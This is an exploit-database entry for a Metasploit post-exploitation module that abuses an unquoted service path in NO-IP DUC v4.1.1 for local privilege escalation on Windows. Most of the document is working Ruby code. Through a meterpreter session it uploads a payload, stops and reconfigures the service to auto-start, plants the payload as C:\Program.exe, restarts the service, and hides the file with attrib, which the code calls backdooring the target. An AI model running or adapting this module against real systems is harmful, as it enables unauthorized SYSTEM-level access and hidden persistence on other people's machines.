NO-IP DUC v4.1.1 Unquoted Service Path Privilege Escalation Exploit

2016-10-28T00:00:00
ID 1337DAY-ID-26164
Type zdt
Reporter rootexploit
Modified 2016-10-28T00:00:00

Description

Exploit Title : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation' PDF Version : 4.1.1 vuln Discover : Ehsan Hosseini Module Author : pedr0 Ubuntu [r00t-3xp10it] Tested on : Windows 7 Professional Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe [ DESCRIPTION ] NO-IP DUC v4.1.1 installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges.


C:\>sc qc NoIPDUCService4
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NoIPDUCService4
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\No-IP\ducservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NO-IP DUC v4.1.1
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted.

Usage Info

The session number to run this module on => set SESSION 3 Input full path of Program.exe to be uploaded => set UPLOAD_PATH /root/Program.exe Check NoIPDUCService4 service auto-start status? => set SERVICE_STATUS true use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true HINT: To unset all options: msf post(NO-IP_privilege_scalation) > unset all Edit post-exploitation module (exploit) to read instructions

                                        
                                            ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


##
# Exploit Title  : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation'
# PDF Version    : 4.1.1
# vuln Discover  : Ehsan Hosseini
# Module Author  : pedr0 Ubuntu [r00t-3xp10it]
# Tested on      : Windows 7 Professional
# Software Link  : http://www.noip.com/client/DUCSetup_v4_1_1.exe
#
#
#
# [ DESCRIPTION ]
# NO-IP DUC v4.1.1 installs a service with an unquoted service path.
# This enables a local privilege escalation vulnerability. To exploit this vulnerability,
# a local attacker can insert an executable file in the path of the service.
# Rebooting the system or restarting the service will run the malicious executable
# with elevated privileges.
#
# ---------------------------------------------------------------------------
# C:\>sc qc NoIPDUCService4                                                       
# [SC] QueryServiceConfig SUCCESS                                                 
#                                                                                 
# SERVICE_NAME: NoIPDUCService4                                                    
#         TYPE               : 10  WIN32_OWN_PROCESS                              
#         START_TYPE         : 2   AUTO_START                                     
#         ERROR_CONTROL      : 1   NORMAL                                         
#         BINARY_PATH_NAME   :  C:\Program Files\No-IP\ducservice.exe                                        
#         LOAD_ORDER_GROUP   :                                                    
#         TAG                : 0                                                  
#         DISPLAY_NAME       : NO-IP DUC v4.1.1                             
#         DEPENDENCIES       :                                                    
#         SERVICE_START_NAME : LocalSystem
# ---------------------------------------------------------------------------
# Using the BINARY_PATH_NAME listed above as an example, an executable named
# "Program.exe" could be placed in "C:\", and it would be executed as the
# Local System user next time the service was restarted.
#
#
#
# [ MODULE OPTIONS ]
# Input The session number to run this module on  => set SESSION 3
# Input full path of Program.exe to be uploaded   => set UPLOAD_PATH /root/Program.exe
# Check pdfcDispatcher service auto-start status? => set SERVICE_STATUS true
# use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true
# HINT: to unset all options: msf post(NO-IP_privilege_scalation) > unset all
#
#
#
# [ PORT MODULE TO METASPLOIT DATABASE ]
# Kali linux   COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Manually Path Search: [email protected]:~# locate modules/post/windows/escalate
#
#
# [ LOAD/USE AUXILIARY ]
# meterpreter > background
# msf exploit(handler) > reload_all
# msf exploit(handler) > use post/windows/escalate/NO-IP_privilege_scalation
# msf post(NO-IP_privilege_scalation) > info
# msf post(NO-IP_privilege_scalation) > show options
# msf post(NO-IP_privilege_scalation) > show advanced options
# msf post(NO-IP_privilege_scalation) > set [option(s)]
# msf post(NO-IP_privilege_scalation) > exploit
##



# ----------------------------
# Module Dependencies/requires
# ----------------------------
require 'rex'
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'



# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------
class MetasploitModule < Msf::Post
      Rank = ExcellentRanking
 
         include Msf::Post::Common
         include Msf::Post::Windows::Priv



# -----------------------------------------
# Building Metasploit/Armitage info GUI/CLI
# -----------------------------------------
        def initialize(info={})
                super(update_info(info,
                        'Name'          => 'NO-IP_DUC v4.1.1 - Unquoted Service Path Privilege Escalation',
                        'Description'   => %q{
                                        This post-exploitation module requires a meterpreter session to be able to upload/inject our Program.exe into NoIPDUCService4 service. NO-IP_DUC v4.1.1 installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "Warning: payload to be uploaded should be named as: Program.exe"
                        },
                        'License'       => UNKNOWN_LICENSE,
                        'Author'        =>
                                [
                                        'Vuln discover: Ehsan Hosseini',    # vulnerability discover
                                        'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
                                        'Special thanks: milton_barra|Chaitanya Haritash', # testing/debug module
                                ],
 
                        'Version'        => '$Revision: 1.0',
                        'DisclosureDate' => 'out 28 2016',
                        'Platform'       => 'windows',
                        'Arch'           => 'x86_x64',
                        'Privileged'     => 'false',
                        'Targets'        =>
                                [
                                         # Tested againts windows 7 (32 bits) | XP SP1 (32 bits)
                                         [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
                                ],
                        'DefaultTarget'  => '3', # default its to run againts windows 7 (32 bits)
                        'References'     =>
                                [
                                         [ 'URL', 'goo.gl/ew1IUm' ],
                                         [ 'URL', 'goo.gl/U54297' ],
                                         [ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],
                                         [ 'URL', 'http://sourceforge.net/projects/msf-auxiliarys/repository' ]
                                ],
			'DefaultOptions' =>
				{
                                         'SESSION' => '1', # Default its to run againts session 1
				},
                        'SessionTypes'   => [ 'meterpreter' ]
 
                ))
 
                register_options(
                        [
                                OptString.new('SESSION', [ true, 'The session number to run this module on']),
                                OptString.new('UPLOAD_PATH', [ false, 'The full path of Program.exe to be uploaded']),
                                OptBool.new('SERVICE_STATUS', [ false, 'Check remote NoIPDUCService4 service settings?' , false]),
                                OptBool.new('HIDDEN_ATTRIB', [ false, 'Use Attrib command to Hide Program.exe?' , false])
                        ], self.class)
 
        end




# ----------------------------------------------
# Check for proper target Platform (win32|win64)
# ----------------------------------------------
def unsupported
   session = client
     sys = session.sys.config.sysinfo
       print_warning("[ABORT]: Operative System => #{sys['OS']}")
       print_error("Only windows systems are supported by this module...")
       print_error("Please execute [info] for further information...")
       print_line("")
   raise Rex::Script::Completed
end




# -----------------------------------------------------------
# UPLOAD OUR EXECUTABLE INTO NoIPDUCService4 BINARY_PATH_NAME
# -----------------------------------------------------------
def ls_stage1

  r=''
  session = client
  shell = "Program.exe"
  payload = "C:\\Program.exe"
  upath = datastore['UPLOAD_PATH']
  bin_path = "C:\\Program Files\\No-IP\\ducservice.exe"
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['UPLOAD_PATH'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set UPLOAD_PATH option!")
    return nil
  else
    print_status("Deploying backdoor into target system!")
    sleep(1.0)
  end


    # check if vulnerable service (executable) exists
    if client.fs.file.exist?("#{bin_path}")
      print_warning("NoIPDUCService4 service:found")
      sleep(1.0)
      print_good("Stoping NoIPDUCService4 service...")
      # stop service to enable proper configuration
      r = session.sys.process.execute("cmd.exe /c sc stop NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})
      sleep(2.5)
       print_good("Set service to auto-start with windows...")
       # set service to auto-start with windows
       r = session.sys.process.execute("cmd.exe /c sc config NoIPDUCService4 start= auto", nil, {'Hidden' => true, 'Channelized' => true})
        sleep(1.0)

          # upload our executable into temp foldder
          print_good("Uploading payload to target system...")
          client.fs.file.upload("%temp%\\#{shell}","#{upath}")
          sleep(2.0)

          # move payload to the rigth directory (unquoted service path)
          print_good("moving payload to: #{payload}")
          r = session.sys.process.execute("cmd.exe /c move /y %temp%\\#{shell} #{payload}", nil, {'Hidden' => true, 'Channelized' => true})
          sleep(1.0)

          # start remote service ...
          print_good("Restarting pdfcDispatcher service...")
          r = session.sys.process.execute("cmd.exe /c sc start NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})
          sleep(2.0)

        # task completed successefully...
        print_warning("NoIPDUCService4 service [binary_path_name] backdoored successefuly!")
        print_status("Setup one handler and Wait everytime that system restarts OR")
        print_status("Setup one handler and restart NoIPDUCService4 service: sc start NoIPDUCService4")
        print_line("")

    else
      print_error("NoIPDUCService4 service => NOT FOUND...")
      print_warning("Target system does not appear to vulnerable to this")
      print_warning("post-module has aborted all tasks in hands :( ")
      print_line("")
    end

    # close channel when done
    r.channel.close
    r.close

  # error exception funtion
  rescue ::Exception => e
  print_error("Error: #{e.class} #{e}")
end




# -------------------------------------------------
# USE ATTRIB COMMAND TO HIDDE PROGRAM.EXE (PAYLOAD)
# -------------------------------------------------
def ls_stage2

  r=''
  session = client
  shell = "Program.exe"
  payload = "C:\\Program.exe"
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['HIDDEN_ATTRIB'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set HIDDEN_ATTRIB option!")
    return nil
  else
    print_status("Using Attrib command to hide backdoor!")
    sleep(1.0)
  end


    # check if backdoor.exe exist on target
    if client.fs.file.exist?("#{payload}")
      print_status("Backdoor #{shell} file:found")
      sleep(1.0)
      # change attributes of backdoor to hidde it from site...
      r = session.sys.process.execute("cmd.exe /c attrib +h +s #{payload}", nil, {'Hidden' => true, 'Channelized' => true})
      print_good(" Execute => attrib +h +s #{payload}")
      sleep(2.0)

        # diplay output to user
        print_status("Our #{shell} its hidden from normal people!")
        print_status("Just dont feed the black hacker within :( ")
        print_warning("To revert attributes: attrib -h -s #{payload}")
        print_line("")

      # close channel when done
      r.channel.close
      r.close

    else
      print_error("#{payload}  => NOT FOUND...")
      print_warning("post-module has aborted all tasks in hands :( ")
      print_line("")
    end


  # error exception funtion
  rescue ::Exception => e
  print_error("Error: #{e.class} #{e}")
end




# -------------------------------------------
# CHECK/DISPLAY pdfcDispatcher SERVICE STATUS
# -------------------------------------------
def ls_stage3

  r=''
  session = client
  serv="NoIPDUCService4"
  sysnfo = session.sys.config.sysinfo
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['SERVICE_STATUS'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set SERVICE_STATUS option!")
    return nil
  else
    print_status("Checking NoIPDUCService4 service settings!")
    sleep(1.0)
  end


    print_warning("Reading service hive registry keys...")
    # search in target regedit for WSearch auto-start service status
    # Value:Start - dword: 2 - auto | 3 - manual | 4 - disabled
    if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '2'
      startup = "auto_start"
    end
    if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '3'
      startup = "manual_start"
    end
    if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '4'
      startup = "disabled_start"
    else
        startup = "unknow"
        print_error("post-module cant define service auto_start status...")
        print_warning("enter into a shell session and execute: sc qc NoIPDUCService4 status") 
    end


      sleep(1.0)
      # display pdfcDispatcher service current settings.
      print_line("")
      print_line("    :host    => #{sysnfo['Computer']}")
      print_line("    :service => #{serv}")
      print_line("    :status  => running")
      print_line("    :startup => #{startup}")
      print_line("")

  # error exception funtion
  rescue ::Exception => e
  print_error("Error: #{e.class} #{e}")
end




# ------------------------------------------------
# MAIN DISPLAY WINDOWS (ALL MODULES - def run)
# Running sellected modules against session target
# ------------------------------------------------
def run
  session = client
    # Check for proper target Platform
    unsupported if client.platform !~ /win32|win64/i

      # Variable declarations (msf API calls)
      sysnfo = session.sys.config.sysinfo
      runtor = client.sys.config.getuid
      runsession = client.session_host
      directory = client.fs.dir.pwd


    # Print banner and scan results on screen pdfcDispatcher
    print_line("    +----------------------------------------------+")
    print_line("    |   NO-IP_DUCK - SERVICE PRIVILEGE ESCALATION  |")
    print_line("    |     Author: Pedro Ubuntu [ r00t-3xp10it ]    |")
    print_line("    +----------------------------------------------+")
    print_line("")
    print_line("    Running on session  : #{datastore['SESSION']}")
    print_line("    Computer            : #{sysnfo['Computer']}")
    print_line("    Operative System    : #{sysnfo['OS']}")
    print_line("    Target IP addr      : #{runsession}")
    print_line("    Payload directory   : #{directory}")
    print_line("    Client UID          : #{runtor}")
    print_line("")
    print_line("")


    # elevate session privileges befor runing options
    client.sys.config.getprivs.each do |priv|
    end

 
# ------------------------------------
# Selected settings to run
# ------------------------------------
      if datastore['UPLOAD_PATH']
         ls_stage1
      end

      if datastore['HIDDEN_ATTRIB']
         ls_stage2
      end

      if datastore['SERVICE_STATUS']
         ls_stage3
      end
   end
end

#  0day.today [2018-04-08]  #